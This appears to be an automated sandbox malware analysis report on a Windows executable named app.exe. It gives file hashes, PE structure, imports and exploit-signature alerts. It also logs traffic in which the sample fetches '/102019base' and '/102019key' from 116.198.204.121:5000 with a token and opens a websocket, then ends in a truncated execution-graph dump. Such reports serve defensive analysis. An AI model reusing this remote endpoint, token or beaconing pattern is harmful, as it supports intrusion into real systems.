                                                                                                                                                                                                          SHA-256:65793EA25DB11AD2A4E3BA3534F6DA80BDF938CE20F3FCD495512C798AE3AE2A
                                                                                                                                                                                                          SHA-512:E8B755A2A2884354575D860B3E6246B9C158E1441BB2633A27D7269946179CC88C1B469591218A29A703282AF8018F1786C32718DF8E647B15A9A8C608736113
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):661504
                                                                                                                                                                                                          Entropy (8bit):6.420428803400377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:ltcSA9OcfdMkwi3F3EmIXZn8oMyK+BCXnA3M8fMJoBWhZs2:ltc59/akwuIGyK+BCXnA3
                                                                                                                                                                                                          MD5:F26BF22BD451DEF507E83536AEE14EED
                                                                                                                                                                                                          SHA1:53402BEFBE817A1ADB359C7B159B4C5AC2055003
                                                                                                                                                                                                          SHA-256:05BB0130F6B40EE2B07BC615F15212D57F63D4EBD0C371E330CBBFC6BBC4D89D
                                                                                                                                                                                                          SHA-512:45B6383D4B85D54452E8D81D1F42D5EC821659722B7A455ABB3CE5B7FCA79DD167CA535112106B63F68899C281FE5978CBB445D6AF500EC4188F4E049724B9E4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):2.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qn:qn
                                                                                                                                                                                                          MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                          SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                          SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                          SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:blat
                                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):7.997412854456683
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:app.exe
                                                                                                                                                                                                          File size:27'056'395 bytes
                                                                                                                                                                                                          MD5:ee3f845b0064d326c91bc200fe87fa2e
                                                                                                                                                                                                          SHA1:e9d99e982eef27dea832f38a3ba8e0b25ff3fc8e
                                                                                                                                                                                                          SHA256:134ef7be21da1bf756cc595ddd67b1caedda2ab4bb200ef9bbec5173aff7ffb1
                                                                                                                                                                                                          SHA512:9b451bda043059e36bf2d72461394c4f50cda757364667103b32b4600963a27971d0bea53a329a9a761d3b746d9d0771edc2ef312b560329859c676fcbfcad75
                                                                                                                                                                                                          SSDEEP:786432:j7r49xSIt++Kyi1UgH7JTBr6xoy2A+mtjPc10Pga:jgiL+diqgHpBVyxBzc10Pga
                                                                                                                                                                                                          TLSH:C357334592908D8DF8B5523ECA061535EAB3F9201B10D09F4AA7B87E7F037F28B5DE91
                                                                                                                                                                                                          Icon Hash:4a464cd47461e179
                                                                                                                                                                                                          Entrypoint:0x14000afb0
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                          Time Stamp:0x66B4D574 [Thu Aug 8 14:25:56 2024 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                          OS Version Minor:2
                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                          File Version Minor:2
                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                          Subsystem Version Minor:2
                                                                                                                                                                                                          Import Hash:a6cec5b1a631d592d80900ab7e1de8df
                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                          call 00007FB8FCD6363Ch
                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                          jmp 00007FB8FCD62FAFh
                                                                                                                                                                                                          int3
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3bc94 | 0x78 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0xf494 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x4e000 | 0x20c4 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x62000 | 0x758 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x39420 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x392e0 | 0x140 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2a000 | 0x418 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x28720 | 0x28800 | bde1e371902cf81ea9be7e3f95382cfd | False | 0.5581657503858025 | data | 6.484685085891853 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x2a000 | 0x12a9e | 0x12c00 | 1a246421e8d0c7b1f36cd1b5f78e7864 | False | 0.5159765625 | data | 5.8203348191135 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x3d000 | 0x103e8 | 0xe00 | baf7e08c61eeb50b5a3978422561c938 | False | 0.13113839285714285 | data | 1.8069121639354628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x4e000 | 0x20c4 | 0x2200 | 306be8c7742d2c9622517b124ebf3ac1 | False | 0.4775965073529412 | data | 5.330382837068586 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| _RDATA | 0x51000 | 0x15c | 0x200 | e9000b5de7c8ee475c9ff9bfd52a2223 | False | 0.392578125 | data | 2.7647001855526416 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x52000 | 0xf494 | 0xf600 | 064ef86623bc924db980569fbb06041f | False | 0.8034965701219512 | data | 7.555563756301485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x62000 | 0x758 | 0x800 | bc11f54c2d33adf3a95c6af00e70eb22 | False | 0.5390625 | data | 5.236213438241001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x52208 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.585820895522388 |
| RT_ICON | 0x530b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.7360108303249098 |
| RT_ICON | 0x53958 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.755057803468208 |
| RT_ICON | 0x53ec0 | 0x952c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9975384937676757 |
| RT_ICON | 0x5d3ec | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.3887966804979253 |
| RT_ICON | 0x5f994 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.49530956848030017 |
| RT_ICON | 0x60a3c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.7207446808510638 |
| RT_GROUP_ICON | 0x60ea4 | 0x68 | data | | | 0.7019230769230769 |
| RT_MANIFEST | 0x60f0c | 0x588 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.4456214689265537 |

| DLL | Import |
|---|---|
| USER32.dll | CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW |
| COMCTL32.dll | |
| KERNEL32.dll | IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW |
| ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW |
| GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-12T16:50:19.161491+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.5 | 49708 | TCP |
| 2024-11-12T16:51:00.524914+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.5 | 64106 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273569107 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.273619890 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.275789976 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.280818939 CET500049706116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.280939102 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.281018019 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:07.286356926 CET500049706116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.240978003 CET500049706116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.283884048 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.427819014 CET500049706116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.428258896 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.435295105 CET500049705116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.435355902 CET497055000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.471364021 CET497065000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.565599918 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.570580959 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.570666075 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.570816994 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:08.575584888 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:09.543019056 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:09.548814058 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:09.553881884 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:19.535305977 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:19.540805101 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:29.534214973 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:29.539021969 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:39.549844027 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:39.555354118 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:49.549848080 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:49.806898117 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:50:59.566390991 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:50:59.571224928 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:09.628536940 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:09.633605003 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:19.627985001 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:19.636013031 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:29.643758059 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:29.648780107 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:39.643537045 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:39.648566961 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:49.643471003 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:49.648452997 CET500049707116.198.204.121192.168.2.5
                                                                                                                                                                                                          Nov 12, 2024 16:51:59.659029961 CET497075000192.168.2.5116.198.204.121
                                                                                                                                                                                                          Nov 12, 2024 16:51:59.664134026 CET500049707116.198.204.121192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 16:50:22.306814909 CET | 53 | 64064 | 1.1.1.1 | 192.168.2.5
                                                                                                                                                                                                          • https:
                                                                                                                                                                                                            • 116.198.204.121:5000
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 116.198.204.121 | 5000 | 4308 | C:\Users\user\Desktop\app.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 16:50:06.130069971 CET | 516 | OUT | GET /102019base HTTP/1.1
                                                                                                                                                                                                          Host: 116.198.204.121:5000
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Authorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51w
                                                                                                                                                                                                          Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                          Referer: https://www.baidu.com/
                                                                                                                                                                                                          Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
Nov 12, 2024 16:50:07.089440107 CET | 119 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 17824
                                                                                                                                                                                                          Date: Tue, 12 Nov 2024 15:50:06 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 116.198.204.121 | 5000 | 4308 | C:\Users\user\Desktop\app.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 16:50:07.281018019 CET | 515 | OUT | GET /102019key HTTP/1.1
                                                                                                                                                                                                          Host: 116.198.204.121:5000
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Authorization: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJvWjlKaXdSVW1vdl9GTl8wSWVHTlBSWUh4d1ZVIiwiZXhwIjoxNjYyODY2NjM5fQ.3iOvX3R5vcdlxd9IIHnzXiVV7ZY6ipgSuBNt3daR51w
                                                                                                                                                                                                          Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                          Referer: https://www.baidu.com/
                                                                                                                                                                                                          Cookie: sid=079cbb01-8f44-4dc6-8fd0-3df76e4ee289
Nov 12, 2024 16:50:08.240978003 CET | 116 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 16
                                                                                                                                                                                                          Date: Tue, 12 Nov 2024 15:50:08 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 116.198.204.121 | 5000 | 4308 | C:\Users\user\Desktop\app.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 16:50:08.570816994 CET | 210 | OUT | GET /xiewangzhenyan HTTP/1.1
                                                                                                                                                                                                          Upgrade: websocket
                                                                                                                                                                                                          Host: 116.198.204.121:5000
                                                                                                                                                                                                          Origin: http://116.198.204.121:5000
                                                                                                                                                                                                          Sec-WebSocket-Key: ScSGY5QfdPym9roNV3Q5ZA==
                                                                                                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                                                                                                          Connection: upgrade
Nov 12, 2024 16:50:09.543019056 CET | 129 | IN | HTTP/1.1 101 Switching Protocols
                                                                                                                                                                                                          Upgrade: websocket
                                                                                                                                                                                                          Connection: Upgrade
                                                                                                                                                                                                          Sec-WebSocket-Accept: +JK+w9DUfgKEQM5zuhXi80E72Hw=


                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:10:49:59
                                                                                                                                                                                                          Start date:12/11/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\app.exe"
                                                                                                                                                                                                          Imagebase:0x7ff7ace80000
                                                                                                                                                                                                          File size:27'056'395 bytes
                                                                                                                                                                                                          MD5 hash:EE3F845B0064D326C91BC200FE87FA2E
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

Target ID: 2
Start time: 10:50:03
Start date: 12/11/2024
Path: C:\Users\user\Desktop\app.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\app.exe"
Imagebase: 0x7ff7ace80000
File size: 27'056'395 bytes
MD5 hash: EE3F845B0064D326C91BC200FE87FA2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false


Execution Graph

Execution Coverage: 10%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 13.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 32
15401->15402 15403 7ff7ace927e5 15401->15403 15404 7ff7ace9280f 15402->15404 15405 7ff7ace92778 15402->15405 15406 7ff7ace9283f 15403->15406 15407 7ff7ace927ea 15403->15407 15484 7ff7ace90ce0 15404->15484 15414 7ff7ace9277d 15405->15414 15418 7ff7ace9284e 15405->15418 15406->15404 15406->15418 15425 7ff7ace927a8 15406->15425 15408 7ff7ace9281f 15407->15408 15409 7ff7ace927ec 15407->15409 15491 7ff7ace908d0 15408->15491 15411 7ff7ace9278d 15409->15411 15417 7ff7ace927fb 15409->15417 15426 7ff7ace9287d 15411->15426 15466 7ff7ace93094 15411->15466 15414->15411 15415 7ff7ace927c0 15414->15415 15414->15425 15415->15426 15476 7ff7ace93550 15415->15476 15417->15404 15420 7ff7ace92800 15417->15420 15418->15426 15498 7ff7ace910f0 15418->15498 15420->15426 15480 7ff7ace936e8 15420->15480 15421 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15422 7ff7ace92b13 15421->15422 15422->15394 15425->15426 15505 7ff7ace9d930 15425->15505 15426->15421 15428 7ff7ace92403 15427->15428 15429 7ff7ace92419 15427->15429 15430 7ff7ace92457 15428->15430 15431 7ff7ace92772 15428->15431 15432 7ff7ace927e5 15428->15432 15429->15430 15433 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15429->15433 15430->15394 15434 7ff7ace9280f 15431->15434 15435 7ff7ace92778 15431->15435 15436 7ff7ace9283f 15432->15436 15437 7ff7ace927ea 15432->15437 15433->15430 15440 7ff7ace90ce0 38 API calls 15434->15440 15439 7ff7ace9284e 15435->15439 15444 7ff7ace9277d 15435->15444 15436->15434 15436->15439 15455 7ff7ace927a8 15436->15455 15438 7ff7ace9281f 15437->15438 15441 7ff7ace927ec 15437->15441 15442 7ff7ace908d0 38 API calls 15438->15442 15446 7ff7ace910f0 38 API calls 15439->15446 15456 7ff7ace9287d 15439->15456 15440->15455 15447 7ff7ace927fb 15441->15447 15448 7ff7ace9278d 15441->15448 15442->15455 15443 7ff7ace93094 47 API calls 15443->15455 15445 7ff7ace927c0 15444->15445 15444->15448 15444->15455 15449 7ff7ace93550 47 API calls 15445->15449 15445->15456 15446->15455 15447->15434 15450 7ff7ace92800 15447->15450 
15448->15443 15448->15456 15449->15455 15452 7ff7ace936e8 37 API calls 15450->15452 15450->15456 15451 7ff7ace8acd0 _wfindfirst32i64 8 API calls 15453 7ff7ace92b13 15451->15453 15452->15455 15453->15394 15454 7ff7ace9d930 47 API calls 15454->15455 15455->15454 15455->15456 15456->15451 15654 7ff7ace8fea4 15457->15654 15461 7ff7ace93967 15460->15461 15671 7ff7ace9ca90 15461->15671 15467 7ff7ace930b6 15466->15467 15515 7ff7ace8fd10 15467->15515 15472 7ff7ace93950 45 API calls 15473 7ff7ace931f3 15472->15473 15474 7ff7ace93950 45 API calls 15473->15474 15475 7ff7ace9327c 15473->15475 15474->15475 15475->15425 15477 7ff7ace93568 15476->15477 15479 7ff7ace935d0 15476->15479 15478 7ff7ace9d930 47 API calls 15477->15478 15477->15479 15478->15479 15479->15425 15483 7ff7ace93709 15480->15483 15481 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15482 7ff7ace9373a 15481->15482 15482->15425 15483->15481 15483->15482 15485 7ff7ace90d13 15484->15485 15486 7ff7ace90d42 15485->15486 15488 7ff7ace90dff 15485->15488 15487 7ff7ace8fd10 12 API calls 15486->15487 15490 7ff7ace90d7f 15486->15490 15487->15490 15489 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15488->15489 15489->15490 15490->15425 15492 7ff7ace90903 15491->15492 15493 7ff7ace90932 15492->15493 15495 7ff7ace909ef 15492->15495 15494 7ff7ace8fd10 12 API calls 15493->15494 15496 7ff7ace9096f 15493->15496 15494->15496 15497 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15495->15497 15496->15425 15497->15496 15499 7ff7ace91123 15498->15499 15500 7ff7ace91152 15499->15500 15502 7ff7ace9120f 15499->15502 15501 7ff7ace8fd10 12 API calls 15500->15501 15504 7ff7ace9118f 15500->15504 15501->15504 15503 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15502->15503 15503->15504 15504->15425 15506 7ff7ace9d958 15505->15506 15507 7ff7ace9d99d 15506->15507 15508 7ff7ace9d95d memcpy_s 15506->15508 15510 7ff7ace93950 45 API calls 15506->15510 15511 7ff7ace9d986 memcpy_s 15506->15511 15507->15508 15507->15511 15651 
7ff7ace9efe8 15507->15651 15508->15425 15509 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15509->15508 15510->15507 15511->15508 15511->15509 15516 7ff7ace8fd36 15515->15516 15517 7ff7ace8fd47 15515->15517 15523 7ff7ace9d648 15516->15523 15517->15516 15518 7ff7ace9c9fc _fread_nolock 12 API calls 15517->15518 15519 7ff7ace8fd74 15518->15519 15520 7ff7ace8fd88 15519->15520 15521 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15519->15521 15522 7ff7ace99d48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15520->15522 15521->15520 15522->15516 15524 7ff7ace9d665 15523->15524 15525 7ff7ace9d698 15523->15525 15526 7ff7ace99c14 _invalid_parameter_noinfo 37 API calls 15524->15526 15525->15524 15527 7ff7ace9d6ca 15525->15527 15535 7ff7ace931d1 15526->15535 15531 7ff7ace9d7dd 15527->15531 15540 7ff7ace9d712 15527->15540 15528 7ff7ace9d8cf 15578 7ff7ace9cb34 15528->15578 15530 7ff7ace9d895 15571 7ff7ace9cecc 15530->15571 15531->15528 15531->15530 15533 7ff7ace9d864 15531->15533 15534 7ff7ace9d827 15531->15534 15537 7ff7ace9d81d 15531->15537 15564 7ff7ace9d1ac 15533->15564 15554 7ff7ace9d3dc 15534->15554 15535->15472 15535->15473 15537->15530 15539 7ff7ace9d822 15537->15539 15539->15533 15539->15534 15540->15535 15545 7ff7ace990dc 15540->15545 15543 7ff7ace99d00 _wfindfirst32i64 17 API calls 15544 7ff7ace9d92c 15543->15544 15546 7ff7ace990f3 15545->15546 15547 7ff7ace990e9 15545->15547 15548 7ff7ace94374 _get_daylight 11 API calls 15546->15548 15547->15546 15552 7ff7ace9910e 15547->15552 15549 7ff7ace990fa 15548->15549 15550 7ff7ace99ce0 _invalid_parameter_noinfo 37 API calls 15549->15550 15551 7ff7ace99106 15550->15551 15551->15535 15551->15543 15552->15551 15553 7ff7ace94374 _get_daylight 11 API calls 15552->15553 15553->15549 15587 